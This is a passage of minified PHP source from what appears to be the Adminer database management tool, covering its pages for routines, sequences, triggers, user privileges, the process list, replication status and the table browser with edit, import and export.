<tr><th>',lang(203),'<td><input type="number" name="INTERVAL_VALUE" value="',h($K["INTERVAL_VALUE"]),'" class="size"> ',html_select("INTERVAL_FIELD",$Ad,$K["INTERVAL_FIELD"]),'<tr><th>',lang(109),'<td>',html_select("STATUS",$Wg,$K["STATUS"]),'<tr><th>',lang(47),'<td><input name="EVENT_COMMENT" value="',h($K["EVENT_COMMENT"]),'" maxlength="64">
<tr><th> <td>',checkbox("ON_COMPLETION","PRESERVE",$K["ON_COMPLETION"]=="PRESERVE",lang(204)),'</table>
<p>';textarea("EVENT_DEFINITION",$K["EVENT_DEFINITION"]);echo'<p>
<input type="submit" value="',lang(14),'">
';if($aa!=""){echo'<input type="submit" name="drop" value="',lang(119),'"',confirm(),'>';}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["procedure"])){$da=$_GET["procedure"];$rg=(isset($_GET["function"])?"FUNCTION":"PROCEDURE");$K=$_POST;$K["fields"]=(array)$K["fields"];if($_POST&&!process_fields($K["fields"])&&!$n){$qh="$K[name]_adminer_".uniqid();drop_create("DROP $rg ".idf_escape($da),create_routine($rg,$K),"DROP $rg ".idf_escape($K["name"]),create_routine($rg,array("name"=>$qh)+$K),"DROP $rg ".idf_escape($qh),substr(ME,0,-1),lang(205),lang(206),lang(207),$da,$K["name"]);}page_header(($da!=""?(isset($_GET["function"])?lang(208):lang(209)).": ".h($da):(isset($_GET["function"])?lang(210):lang(211))),$n);if(!$_POST&&$da!=""){$K=routine($da,$rg);$K["name"]=$da;}$ob=get_vals("SHOW CHARACTER SET");sort($ob);$sg=routine_languages();echo'
<form action="" method="post" id="form">
<p>',lang(174),': <input name="name" value="',h($K["name"]),'" maxlength="64" autocapitalize="off">
',($sg?lang(19).": ".html_select("language",$sg,$K["language"]):""),'<input type="submit" value="',lang(14),'">
<table cellspacing="0" class="nowrap">
';edit_fields($K["fields"],$ob,$rg);if(isset($_GET["function"])){echo"<tr><td>".lang(212);edit_type("returns",$K["returns"],$ob);}echo'</table>
<p>';textarea("definition",$K["definition"]);echo'<p>
<input type="submit" value="',lang(14),'">
';if($da!=""){echo'<input type="submit" name="drop" value="',lang(119),'"',confirm(),'>';}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["sequence"])){$fa=$_GET["sequence"];$K=$_POST;if($_POST&&!$n){$_=substr(ME,0,-1);$C=trim($K["name"]);if($_POST["drop"])query_redirect("DROP SEQUENCE ".idf_escape($fa),$_,lang(213));elseif($fa=="")query_redirect("CREATE SEQUENCE ".idf_escape($C),$_,lang(214));elseif($fa!=$C)query_redirect("ALTER SEQUENCE ".idf_escape($fa)." RENAME TO ".idf_escape($C),$_,lang(215));else
redirect($_);}page_header($fa!=""?lang(216).": ".h($fa):lang(217),$n);if(!$K)$K["name"]=$fa;echo'
<form action="" method="post">
<p><input name="name" value="',h($K["name"]),'" autocapitalize="off">
<input type="submit" value="',lang(14),'">
';if($fa!="")echo"<input type='submit' name='drop' value='".lang(119)."'".confirm().">\n";echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["type"])){$ga=$_GET["type"];$K=$_POST;if($_POST&&!$n){$_=substr(ME,0,-1);if($_POST["drop"])query_redirect("DROP TYPE ".idf_escape($ga),$_,lang(218));else
query_redirect("CREATE TYPE ".idf_escape(trim($K["name"]))." $K[as]",$_,lang(219));}page_header($ga!=""?lang(220).": ".h($ga):lang(221),$n);if(!$K)$K["as"]="AS ";echo'
<form action="" method="post">
<p>
';if($ga!="")echo"<input type='submit' name='drop' value='".lang(119)."'".confirm().">\n";else{echo"<input name='name' value='".h($K['name'])."' autocapitalize='off'>\n";textarea("as",$K["as"]);echo"<p><input type='submit' value='".lang(14)."'>\n";}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["trigger"])){$a=$_GET["trigger"];$C=$_GET["name"];$Nh=trigger_options();$K=(array)trigger($C)+array("Trigger"=>$a."_bi");if($_POST){if(!$n&&in_array($_POST["Timing"],$Nh["Timing"])&&in_array($_POST["Event"],$Nh["Event"])&&in_array($_POST["Type"],$Nh["Type"])){$Se=" ON ".table($a);$Zb="DROP TRIGGER ".idf_escape($C).($x=="pgsql"?$Se:"");$A=ME."table=".urlencode($a);if($_POST["drop"])query_redirect($Zb,$A,lang(222));else{if($C!="")queries($Zb);queries_redirect($A,($C!=""?lang(223):lang(224)),queries(create_trigger($Se,$_POST)));if($C!="")queries(create_trigger($Se,$K+array("Type"=>reset($Nh["Type"]))));}}$K=$_POST;}page_header(($C!=""?lang(225).": ".h($C):lang(226)),$n,array("table"=>$a));echo'
<form action="" method="post" id="form">
<table cellspacing="0">
<tr><th>',lang(227),'<td>',html_select("Timing",$Nh["Timing"],$K["Timing"],"triggerChange(/^".preg_quote($a,"/")."_[ba][iud]$/, '".js_escape($a)."', this.form);"),'<tr><th>',lang(228),'<td>',html_select("Event",$Nh["Event"],$K["Event"],"this.form['Timing'].onchange();"),(in_array("UPDATE OF",$Nh["Event"])?" <input name='Of' value='".h($K["Of"])."' class='hidden'>":""),'<tr><th>',lang(46),'<td>',html_select("Type",$Nh["Type"],$K["Type"]),'</table>
<p>',lang(174),': <input name="Trigger" value="',h($K["Trigger"]);?>" maxlength="64" autocapitalize="off">
<script type="text/javascript">document.getElementById('form')['Timing'].onchange();</script>
<p><?php textarea("Statement",$K["Statement"]);echo'<p>
<input type="submit" value="',lang(14),'">
';if($C!=""){echo'<input type="submit" name="drop" value="',lang(119),'"',confirm(),'>';}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["user"])){$ha=$_GET["user"];$Pf=array(""=>array("All privileges"=>""));foreach(get_rows("SHOW PRIVILEGES")as$K){foreach(explode(",",($K["Privilege"]=="Grant option"?"":$K["Context"]))as$zb)$Pf[$zb][$K["Privilege"]]=$K["Comment"];}$Pf["Server Admin"]+=$Pf["File access on server"];$Pf["Databases"]["Create routine"]=$Pf["Procedures"]["Create routine"];unset($Pf["Procedures"]["Create routine"]);$Pf["Columns"]=array();foreach(array("Select","Insert","Update","References")as$X)$Pf["Columns"][$X]=$Pf["Tables"][$X];unset($Pf["Server Admin"]["Usage"]);foreach($Pf["Tables"]as$y=>$X)unset($Pf["Databases"][$y]);$Ee=array();if($_POST){foreach($_POST["objects"]as$y=>$X)$Ee[$X]=(array)$Ee[$X]+(array)$_POST["grants"][$y];}$bd=array();$Qe="";if(isset($_GET["host"])&&($I=$g->query("SHOW GRANTS FOR ".q($ha)."@".q($_GET["host"])))){while($K=$I->fetch_row()){if(preg_match('~GRANT (.*) ON (.*) TO ~',$K[0],$B)&&preg_match_all('~ *([^(,]*[^ ,(])( *\\([^)]+\\))?~',$B[1],$ke,PREG_SET_ORDER)){foreach($ke
as$X){if($X[1]!="USAGE")$bd["$B[2]$X[2]"][$X[1]]=true;if(preg_match('~ WITH GRANT OPTION~',$K[0]))$bd["$B[2]$X[2]"]["GRANT OPTION"]=true;}}if(preg_match("~ IDENTIFIED BY PASSWORD '([^']+)~",$K[0],$B))$Qe=$B[1];}}if($_POST&&!$n){$Re=(isset($_GET["host"])?q($ha)."@".q($_GET["host"]):"''");if($_POST["drop"])query_redirect("DROP USER $Re",ME."privileges=",lang(229));else{$Ge=q($_POST["user"])."@".q($_POST["host"]);$yf=$_POST["pass"];if($yf!=''&&!$_POST["hashed"]){$yf=$g->result("SELECT PASSWORD(".q($yf).")");$n=!$yf;}$Db=false;if(!$n){if($Re!=$Ge){$Db=queries(($g->server_info<5?"GRANT USAGE ON *.* TO":"CREATE USER")." $Ge IDENTIFIED BY PASSWORD ".q($yf));$n=!$Db;}elseif($yf!=$Qe)queries("SET PASSWORD FOR $Ge = ".q($yf));}if(!$n){$og=array();foreach($Ee
as$Le=>$ad){if(isset($_GET["grant"]))$ad=array_filter($ad);$ad=array_keys($ad);if(isset($_GET["grant"]))$og=array_diff(array_keys(array_filter($Ee[$Le],'strlen')),$ad);elseif($Re==$Ge){$Oe=array_keys((array)$bd[$Le]);$og=array_diff($Oe,$ad);$ad=array_diff($ad,$Oe);unset($bd[$Le]);}if(preg_match('~^(.+)\\s*(\\(.*\\))?$~U',$Le,$B)&&(!grant("REVOKE",$og,$B[2]," ON $B[1] FROM $Ge")||!grant("GRANT",$ad,$B[2]," ON $B[1] TO $Ge"))){$n=true;break;}}}if(!$n&&isset($_GET["host"])){if($Re!=$Ge)queries("DROP USER $Re");elseif(!isset($_GET["grant"])){foreach($bd
as$Le=>$og){if(preg_match('~^(.+)(\\(.*\\))?$~U',$Le,$B))grant("REVOKE",array_keys($og),$B[2]," ON $B[1] FROM $Ge");}}}queries_redirect(ME."privileges=",(isset($_GET["host"])?lang(230):lang(231)),!$n);if($Db)$g->query("DROP USER $Ge");}}page_header((isset($_GET["host"])?lang(33).": ".h("$ha@$_GET[host]"):lang(138)),$n,array("privileges"=>array('',lang(68))));if($_POST){$K=$_POST;$bd=$Ee;}else{$K=$_GET+array("host"=>$g->result("SELECT SUBSTRING_INDEX(CURRENT_USER, '@', -1)"));$K["pass"]=$Qe;if($Qe!="")$K["hashed"]=true;$bd[(DB==""||$bd?"":idf_escape(addcslashes(DB,"%_\\"))).".*"]=array();}echo'<form action="" method="post">
<table cellspacing="0">
<tr><th>',lang(32),'<td><input name="host" maxlength="60" value="',h($K["host"]),'" autocapitalize="off">
<tr><th>',lang(33),'<td><input name="user" maxlength="16" value="',h($K["user"]),'" autocapitalize="off">
<tr><th>',lang(34),'<td><input name="pass" id="pass" value="',h($K["pass"]),'">
';if(!$K["hashed"]){echo'<script type="text/javascript">typePassword(document.getElementById(\'pass\'));</script>';}echo
checkbox("hashed",1,$K["hashed"],lang(232),"typePassword(this.form['pass'], this.checked);"),'</table>
';echo"<table cellspacing='0'>\n","<thead><tr><th colspan='2'>".lang(68).doc_link(array('sql'=>"grant.html#priv_level"));$s=0;foreach($bd
as$Le=>$ad){echo'<th>'.($Le!="*.*"?"<input name='objects[$s]' value='".h($Le)."' size='10' autocapitalize='off'>":"<input type='hidden' name='objects[$s]' value='*.*' size='10'>*.*");$s++;}echo"</thead>\n";foreach(array(""=>"","Server Admin"=>lang(32),"Databases"=>lang(35),"Tables"=>lang(123),"Columns"=>lang(45),"Procedures"=>lang(233),)as$zb=>$Pb){foreach((array)$Pf[$zb]as$Of=>$sb){echo"<tr".odd()."><td".($Pb?">$Pb<td":" colspan='2'").' lang="en" title="'.h($sb).'">'.h($Of);$s=0;foreach($bd
as$Le=>$ad){$C="'grants[$s][".h(strtoupper($Of))."]'";$Y=$ad[strtoupper($Of)];if($zb=="Server Admin"&&$Le!=(isset($bd["*.*"])?"*.*":".*"))echo"<td> ";elseif(isset($_GET["grant"]))echo"<td><select name=$C><option><option value='1'".($Y?" selected":"").">".lang(234)."<option value='0'".($Y=="0"?" selected":"").">".lang(235)."</select>";else
echo"<td align='center'><label class='block'><input type='checkbox' name=$C value='1'".($Y?" checked":"").($Of=="All privileges"?" id='grants-$s-all'":($Of=="Grant option"?"":" onclick=\"if (this.checked) formUncheck('grants-$s-all');\""))."></label>";$s++;}}}echo"</table>\n",'<p>
<input type="submit" value="',lang(14),'">
';if(isset($_GET["host"])){echo'<input type="submit" name="drop" value="',lang(119),'"',confirm(),'>';}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["processlist"])){if(support("kill")&&$_POST&&!$n){$Qd=0;foreach((array)$_POST["kill"]as$X){if(kill_process($X))$Qd++;}queries_redirect(ME."processlist=",lang(236,$Qd),$Qd||!$_POST["kill"]);}page_header(lang(107),$n);echo'
<form action="" method="post">
<table cellspacing="0" onclick="tableClick(event);" ondblclick="tableClick(event, true);" class="nowrap checkable">
';$s=-1;foreach(process_list()as$s=>$K){if(!$s){echo"<thead><tr lang='en'>".(support("kill")?"<th> ":"");foreach($K
as$y=>$X)echo"<th>$y".doc_link(array('sql'=>"show-processlist.html#processlist_".strtolower($y),'pgsql'=>"monitoring-stats.html#PG-STAT-ACTIVITY-VIEW",'oracle'=>"../b14237/dynviews_2088.htm",));echo"</thead>\n";}echo"<tr".odd().">".(support("kill")?"<td>".checkbox("kill[]",$K[$x=="sql"?"Id":"pid"],0):"");foreach($K
as$y=>$X)echo"<td>".(($x=="sql"&&$y=="Info"&&preg_match("~Query|Killed~",$K["Command"])&&$X!="")||($x=="pgsql"&&$y=="current_query"&&$X!="<IDLE>")||($x=="oracle"&&$y=="sql_text"&&$X!="")?"<code class='jush-$x'>".shorten_utf8($X,100,"</code>").' <a href="'.h(ME.($K["db"]!=""?"db=".urlencode($K["db"])."&":"")."sql=".urlencode($X)).'">'.lang(237).'</a>':nbsp($X));echo"\n";}echo'</table>
<script type=\'text/javascript\'>tableCheck();</script>
<p>
';if(support("kill")){echo($s+1)."/".lang(238,max_connections()),"<p><input type='submit' value='".lang(239)."'>\n";}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["replication"])){page_header(lang(110));echo"<h3>".lang(240).doc_link(array("sql"=>"show-master-status.html"))."</h3>\n";$ie=replication_status("MASTER");if(!$ie)echo"<p class='message'>".lang(12)."\n";else{echo"<table cellspacing='0'>\n";foreach($ie[0]as$y=>$X){echo"<tr>","<th>".h($y),"<td>".nbsp($X);}echo"</table>\n";}$Ng=replication_status("SLAVE");if($Ng){echo"<h3>".lang(241).doc_link(array("sql"=>"show-slave-status.html"))."</h3>\n";foreach($Ng[0]as$Mg){echo"<table cellspacing='0'>\n";foreach($Mg
as$y=>$X){echo"<tr>","<th>".h($y),"<td>".nbsp($X);}echo"</table>\n";}}}elseif(isset($_GET["select"])){$a=$_GET["select"];$S=table_status1($a);$w=indexes($a);$p=fields($a);$Tc=column_foreign_keys($a);$Ne="";if($S["Oid"]){$Ne=($x=="sqlite"?"rowid":"oid");$w[]=array("type"=>"PRIMARY","columns"=>array($Ne));}parse_str($_COOKIE["adminer_import"],$ya);$pg=array();$e=array();$uh=null;foreach($p
as$y=>$o){$C=$b->fieldName($o);if(isset($o["privileges"]["select"])&&$C!=""){$e[$y]=html_entity_decode(strip_tags($C),ENT_QUOTES);if(is_shortable($o))$uh=$b->selectLengthProcess();}$pg+=$o["privileges"];}list($M,$cd)=$b->selectColumnsProcess($e,$w);$Ed=count($cd)<count($M);$Z=$b->selectSearchProcess($p,$w);$df=$b->selectOrderProcess($p,$w);$z=$b->selectLimitProcess();$Yc=($M?implode(", ",$M):"*".($Ne?", $Ne":"")).convert_fields($e,$p,$M)."\nFROM ".table($a);$dd=($cd&&$Ed?"\nGROUP BY ".implode(", ",$cd):"").($df?"\nORDER BY ".implode(", ",$df):"");if($_GET["val"]&&is_ajax()){header("Content-Type: text/plain; charset=utf-8");foreach($_GET["val"]as$Vh=>$K){$Ga=convert_field($p[key($K)]);$M=array($Ga?$Ga:idf_escape(key($K)));$Z[]=where_check($Vh,$p);$J=$Xb->select($a,$M,$Z,$M);if($J)echo
reset($J->fetch_row());}exit;}if($_POST&&!$n){$si=$Z;if(!$_POST["all"]&&is_array($_POST["check"])){$eb=array();foreach($_POST["check"]as$bb)$eb[]=where_check($bb,$p);$si[]="((".implode(") OR (",$eb)."))";}$si=($si?"\nWHERE ".implode(" AND ",$si):"");$Kf=$Xh=null;foreach($w
as$v){if($v["type"]=="PRIMARY"){$Kf=array_flip($v["columns"]);$Xh=($M?$Kf:array());break;}}foreach((array)$Xh
as$y=>$X){if(in_array(idf_escape($y),$M))unset($Xh[$y]);}if($_POST["export"]){cookie("adminer_import","output=".urlencode($_POST["output"])."&format=".urlencode($_POST["format"]));dump_headers($a);$b->dumpTable($a,"");if(!is_array($_POST["check"])||$Xh===array())$H="SELECT $Yc$si$dd";else{$Th=array();foreach($_POST["check"]as$X)$Th[]="(SELECT".limit($Yc,"\nWHERE ".($Z?implode(" AND ",$Z)." AND ":"").where_check($X,$p).$dd,1).")";$H=implode(" UNION ALL ",$Th);}$b->dumpData($a,"table",$H);exit;}if(!$b->selectEmailProcess($Z,$Tc)){if($_POST["save"]||$_POST["delete"]){$I=true;$za=0;$O=array();if(!$_POST["delete"]){foreach($e
as$C=>$X){$X=process_input($p[$C]);if($X!==null&&($_POST["clone"]||$X!==false))$O[idf_escape($C)]=($X!==false?$X:idf_escape($C));}}if($_POST["delete"]||$O){if($_POST["clone"])$H="INTO ".table($a)." (".implode(", ",array_keys($O)).")\nSELECT ".implode(", ",$O)."\nFROM ".table($a);if($_POST["all"]||($Xh===array()&&is_array($_POST["check"]))||$Ed){$I=($_POST["delete"]?$Xb->delete($a,$si):($_POST["clone"]?queries("INSERT $H$si"):$Xb->update($a,$O,$si)));$za=$g->affected_rows;}else{foreach((array)$_POST["check"]as$X){$ri="\nWHERE ".($Z?implode(" AND ",$Z)." AND ":"").where_check($X,$p);$I=($_POST["delete"]?$Xb->delete($a,$ri,1):($_POST["clone"]?queries("INSERT".limit1($H,$ri)):$Xb->update($a,$O,$ri)));if(!$I)break;$za+=$g->affected_rows;}}}$se=lang(242,$za);if($_POST["clone"]&&$I&&$za==1){$Wd=last_id();if($Wd)$se=lang(160," $Wd");}queries_redirect(remove_from_uri($_POST["all"]&&$_POST["delete"]?"page":""),$se,$I);if(!$_POST["delete"]){edit_form($a,$p,(array)$_POST["fields"],!$_POST["clone"]);page_footer();exit;}}elseif(!$_POST["import"]){if(!$_POST["val"])$n=lang(243);else{$I=true;$za=0;foreach($_POST["val"]as$Vh=>$K){$O=array();foreach($K
as$y=>$X){$y=bracket_escape($y,1);$O[idf_escape($y)]=(preg_match('~char|text~',$p[$y]["type"])||$X!=""?$b->processInput($p[$y],$X):"NULL");}$I=$Xb->update($a,$O," WHERE ".($Z?implode(" AND ",$Z)." AND ":"").where_check($Vh,$p),!($Ed||$Xh===array())," ");if(!$I)break;$za+=$g->affected_rows;}queries_redirect(remove_from_uri(),lang(242,$za),$I);}}elseif(!is_string($Jc=get_file("csv_file",true)))$n=upload_error($Jc);elseif(!preg_match('~~u',$Jc))$n=lang(244);else{cookie("adminer_import","output=".urlencode($ya["output"])."&format=".urlencode($_POST["separator"]));$I=true;$pb=array_keys($p);preg_match_all('~(?>"[^"]*"|[^"\\r\\n]+)+~',$Jc,$ke);$za=count($ke[0]);$Xb->begin();$Dg=($_POST["separator"]=="csv"?",":($_POST["separator"]=="tsv"?"\t":";"));$L=array();foreach($ke[0]as$y=>$X){preg_match_all("~((?>\"[^\"]*\")+|[^$Dg]*)$Dg~",$X.$Dg,$le);if(!$y&&!array_diff($le[1],$pb)){$pb=$le[1];$za--;}else{$O=array();foreach($le[1]as$s=>$lb)$O[idf_escape($pb[$s])]=($lb==""&&$p[$pb[$s]]["null"]?"NULL":q(str_replace('""','"',preg_replace('~^"|"$~','',$lb))));$L[]=$O;}}$I=(!$L||$Xb->insertUpdate($a,$L,$Kf));if($I)$I=$Xb->commit();queries_redirect(remove_from_uri("page"),lang(245,$za),$I);$Xb->rollback();}}}$gh=$b->tableName($S);if(is_ajax()){page_headers();ob_start();}else
page_header(lang(50).": $gh",$n);$O=null;if(isset($pg["insert"])||!support("table")){$O="";foreach((array)$_GET["where"]as$X){if(count($Tc[$X["col"]])==1&&($X["op"]=="="||(!$X["op"]&&!preg_match('~[_%]~',$X["val"]))))$O.="&set".urlencode("[".bracket_escape($X["col"])."]")."=".urlencode($X["val"]);}}$b->selectLinks($S,$O);if(!$e&&support("table"))echo"<p class='error'>".lang(246).($p?".":": ".error())."\n";else{echo"<form action='' id='form'>\n","<div style='display: none;'>";hidden_fields_get();echo(DB!=""?'<input type="hidden" name="db" value="'.h(DB).'">'.(isset($_GET["ns"])?'<input type="hidden" name="ns" value="'.h($_GET["ns"]).'">':""):"");echo'<input type="hidden" name="select" value="'.h($a).'">',"</div>\n";$b->selectColumnsPrint($M,$e);$b->selectSearchPrint($Z,$e,$w);$b->selectOrderPrint($df,$e,$w);$b->selectLimitPrint($z);$b->selectLengthPrint($uh);$b->selectActionPrint($w);echo"</form>\n";$E=$_GET["page"];if($E=="last"){$Wc=$g->result(count_rows($a,$Z,$Ed,$cd));$E=floor(max(0,$Wc-1)/$z);}$Ag=$M;if(!$Ag){$Ag[]="*";if($Ne)$Ag[]=$Ne;}$_b=convert_fields($e,$p,$M);if($_b)$Ag[]=substr($_b,2);$I=$Xb->select($a,$Ag,$Z,$cd,$df,$z,$E,true);if(!$I)echo"<p class='error'>".error()."\n";else{if($x=="mssql"&&$E)$I->seek($z*$E);$mc=array();echo"<form action='' method='post' enctype='multipart/form-data'>\n";$L=array();while($K=$I->fetch_assoc()){if($E&&$x=="oracle")unset($K["RNUM"]);$L[]=$K;}if($_GET["page"]!="last"&&+$z&&$cd&&$Ed&&$x=="sql")$Wc=$g->result(" SELECT FOUND_ROWS()");if(!$L)echo"<p class='message'>".lang(12)."\n";else{$Pa=$b->backwardKeys($a,$gh);echo"<table id='table' cellspacing='0' class='nowrap checkable' onclick='tableClick(event);' ondblclick='tableClick(event, true);' onkeydown='return editingKeydown(event);'>\n","<thead><tr>".(!$cd&&$M?"":"<td><input type='checkbox' id='all-page' onclick='formCheck(this, /check/);' class='jsonly'> <a href='".h($_GET["modify"]?remove_from_uri("modify"):$_SERVER["REQUEST_URI"]."&modify=1")."'>".lang(247)."</a>");$De=array();$Zc=array();reset($M);$Yf=1;foreach($L[0]as$y=>$X){if($y!=$Ne){$X=$_GET["columns"][key($M)];$o=$p[$M?($X?$X["col"]:current($M)):$y];$C=($o?$b->fieldName($o,$Yf):($X["fun"]?"*":$y));if($C!=""){$Yf++;$De[$y]=$C;$d=idf_escape($y);$nd=remove_from_uri('(order|desc)[^=]*|page').'&order%5B0%5D='.urlencode($y);$Pb="&desc%5B0%5D=1";echo'<th onmouseover="columnMouse(this);" onmouseout="columnMouse(this, \' hidden\');">','<a href="'.h($nd.($df[0]==$d||$df[0]==$y||(!$df&&$Ed&&$cd[0]==$d)?$Pb:'')).'">';echo
apply_sql_function($X["fun"],$C)."</a>";echo"<span class='column hidden'>","<a href='".h($nd.$Pb)."' title='".lang(56)."' class='text'> ↓</a>";if(!$X["fun"])echo'<a href="#fieldset-search" onclick="selectSearch(\''.h(js_escape($y)).'\'); return false;" title="'.lang(53).'" class="text jsonly"> =</a>';echo"</span>";}$Zc[$y]=$X["fun"];next($M);}}$ce=array();if($_GET["modify"]){foreach($L
as$K){foreach($K
as$y=>$X)$ce[$y]=max($ce[$y],min(40,strlen(utf8_decode($X))));}}echo($Pa?"<th>".lang(248):"")."</thead>\n";if(is_ajax()){if($z%2==1&&$E%2==1)odd();ob_end_clean();}foreach($b->rowDescriptions($L,$Tc)as$Ce=>$K){$Uh=unique_array($L[$Ce],$w);if(!$Uh){$Uh=array();foreach($L[$Ce]as$y=>$X){if(!preg_match('~^(COUNT\\((\\*|(DISTINCT )?`(?:[^`]|``)+`)\\)|(AVG|GROUP_CONCAT|MAX|MIN|SUM)\\(`(?:[^`]|``)+`\\))$~',$y))$Uh[$y]=$X;}}$Vh="";foreach($Uh
as$y=>$X){if(($x=="sql"||$x=="pgsql")&&strlen($X)>64){$y=(strpos($y,'(')?$y:idf_escape($y));$y="MD5(".($x=='sql'&&preg_match("~^utf8_~",$p[$y]["collation"])?$y:"CONVERT($y USING ".charset($g).")").")";$X=md5($X);}$Vh.="&".($X!==null?urlencode("where[".bracket_escape($y)."]")."=".urlencode($X):"null%5B%5D=".urlencode($y));}echo"<tr".odd().">".(!$cd&&$M?"":"<td>".checkbox("check[]",substr($Vh,1),in_array(substr($Vh,1),(array)$_POST["check"]),"","this.form['all'].checked = false; formUncheck('all-page');").($Ed||information_schema(DB)?"":" <a href='".h(ME."edit=".urlencode($a).$Vh)."'>".lang(249)."</a>"));foreach($K
as$y=>$X){if(isset($De[$y])){$o=$p[$y];if($X!=""&&(!isset($mc[$y])||$mc[$y]!=""))$mc[$y]=(is_mail($X)?$De[$y]:"");$_="";if(preg_match('~blob|bytea|raw|file~',$o["type"])&&$X!="")$_=ME.'download='.urlencode($a).'&field='.urlencode($y).$Vh;if(!$_&&$X!==null){foreach((array)$Tc[$y]as$q){if(count($Tc[$y])==1||end($q["source"])==$y){$_="";foreach($q["source"]as$s=>$Qg)$_.=where_link($s,$q["target"][$s],$L[$Ce][$Qg]);$_=($q["db"]!=""?preg_replace('~([?&]db=)[^&]+~','\\1'.urlencode($q["db"]),ME):ME).'select='.urlencode($q["table"]).$_;if($q["ns"])$_=preg_replace('~([?&]ns=)[^&]+~','\\1'.urlencode($q["ns"]),$_);if(count($q["source"])==1)break;}}}if($y=="COUNT(*)"){$_=ME."select=".urlencode($a);$s=0;foreach((array)$_GET["where"]as$W){if(!array_key_exists($W["col"],$Uh))$_.=where_link($s++,$W["col"],$W["val"],$W["op"]);}foreach($Uh
as$Kd=>$W)$_.=where_link($s++,$Kd,$W);}$X=select_value($X,$_,$o,$uh);$t=h("val[$Vh][".bracket_escape($y)."]");$Y=$_POST["val"][$Vh][bracket_escape($y)];$hc=!is_array($K[$y])&&is_utf8($X)&&$L[$Ce][$y]==$K[$y]&&!$Zc[$y];$th=preg_match('~text|lob~',$o["type"]);if(($_GET["modify"]&&$hc)||$Y!==null){$fd=h($Y!==null?$Y:$K[$y]);echo"<td>".($th?"<textarea name='$t' cols='30' rows='".(substr_count($K[$y],"\n")+1)."'>$fd</textarea>":"<input name='$t' value='$fd' size='$ce[$y]'>");}else{$ge=strpos($X,"<i>...</i>");echo"<td id='$t' onclick=\"selectClick(this, event, ".($ge?2:($th?1:0)).($hc?"":", '".h(lang(250))."'").");\">$X";}}}if($Pa)echo"<td>";$b->backwardKeysPrint($Pa,$L[$Ce]);echo"</tr>\n";}if(is_ajax())exit;echo"</table>\n";}if(($L||$E)&&!is_ajax()){$wc=true;if($_GET["page"]!="last"){if(!+$z)$Wc=count($L);elseif($x!="sql"||!$Ed){$Wc=($Ed?false:found_rows($S,$Z));if($Wc<max(1e4,2*($E+1)*$z))$Wc=reset(slow_query(count_rows($a,$Z,$Ed,$cd)));else$wc=false;}}if(+$z&&($Wc===false||$Wc>$z||$E)){echo"<p class='pages'>";$ne=($Wc===false?$E+(count($L)>=$z?2:1):floor(($Wc-1)/$z));if($x!="simpledb"){echo'<a href="'.h(remove_from_uri("page"))."\" onclick=\"pageClick(this.href, +prompt('".lang(251)."', '".($E+1)."'), event); return false;\">".lang(251)."</a>:",pagination(0,$E).($E>5?" ...":"");for($s=max(1,$E-4);$s<min($ne,$E+5);$s++)echo
pagination($s,$E);if($ne>0){echo($E+5<$ne?" ...":""),($wc&&$Wc!==false?pagination($ne,$E):" <a href='".h(remove_from_uri("page")."&page=last")."' title='~$ne'>".lang(252)."</a>");}echo(($Wc===false?count($L)+1:$Wc-$E*$z)>$z?' <a href="'.h(remove_from_uri("page")."&page=".($E+1)).'" onclick="return !selectLoadMore(this, '.(+$z).', \''.lang(253).'...\');" class="loadmore">'.lang(254).'</a>':'');}else{echo
lang(251).":",pagination(0,$E).($E>1?" ...":""),($E?pagination($E,$E):""),($ne>$E?pagination($E+1,$E).($ne>$E+1?" ...":""):"");}}echo"<p class='count'>\n",($Wc!==false?"(".($wc?"":"~ ").lang(142,$Wc).") ":"");$Ub=($wc?"":"~ ").$Wc;echo
checkbox("all",1,0,lang(255),"var checked = formChecked(this, /check/); selectCount('selected', this.checked ? '$Ub' : checked); selectCount('selected2', this.checked || !checked ? '$Ub' : checked);")."\n";if($b->selectCommandPrint()){echo'<fieldset',($_GET["modify"]?'':' class="jsonly"'),'><legend>',lang(247),'</legend><div>
<input type="submit" value="',lang(14),'"',($_GET["modify"]?'':' title="'.lang(243).'"'),'>
</div></fieldset>
<fieldset><legend>',lang(118),' <span id="selected"></span></legend><div>
<input type="submit" name="edit" value="',lang(10),'">
<input type="submit" name="clone" value="',lang(237),'">
<input type="submit" name="delete" value="',lang(18),'"',confirm(),'>
</div></fieldset>
';}$Uc=$b->dumpFormat();foreach((array)$_GET["columns"]as$d){if($d["fun"]){unset($Uc['sql']);break;}}if($Uc){print_fieldset("export",lang(70)." <span id='selected2'></span>");$of=$b->dumpOutput();echo($of?html_select("output",$of,$ya["output"])." ":""),html_select("format",$Uc,$ya["format"])," <input type='submit' name='export' value='".lang(70)."'>\n","</div></fieldset>\n";}echo(!$cd&&$M?"":"<script type='text/javascript'>tableCheck();</script>\n");}if($b->selectImportPrint()){print_fieldset("import",lang(69),!$L);echo"<input type='file' name='csv_file'> ",html_select("separator",array("csv"=>"CSV,","csv;"=>"CSV;","tsv"=>"TSV"),$ya["format"],1);echo" <input type='submit' name='import' value='".lang(69)."'>","</div></fieldset>\n";}$b->selectEmailPrint(array_filter($mc,'strlen'),$e);echo"<p><input type='hidden' name='token' value='$Dh'></p>\n","</form>\n";}}if(is_ajax()){ob_end_clean();exit;}}elseif(isset($_GET["variables"])){$P=isset($_GET["status"]);page_header($P?lang(109):lang(108));$ki=($P?show_status():show_variables());if(!$ki)echo"<p class='message'>".lang(12)."\n";else{echo"<table cellspacing='0'>\n";foreach($ki
